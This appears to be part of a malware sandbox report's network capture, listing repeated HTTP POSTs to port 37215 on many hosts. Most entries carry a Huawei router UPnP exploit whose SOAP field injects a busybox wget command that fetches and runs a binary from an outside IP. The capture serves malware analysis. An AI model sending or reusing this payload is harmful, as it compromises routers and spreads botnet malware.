                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.538038015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      11192.168.2.1434688156.64.254.8837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.616900921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.202136993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.906114101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.282062054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      12192.168.2.1459788156.44.92.21337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.618072033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.202138901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.906114101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.282059908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      13192.168.2.1434444156.75.31.5537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.619477987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.202142954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
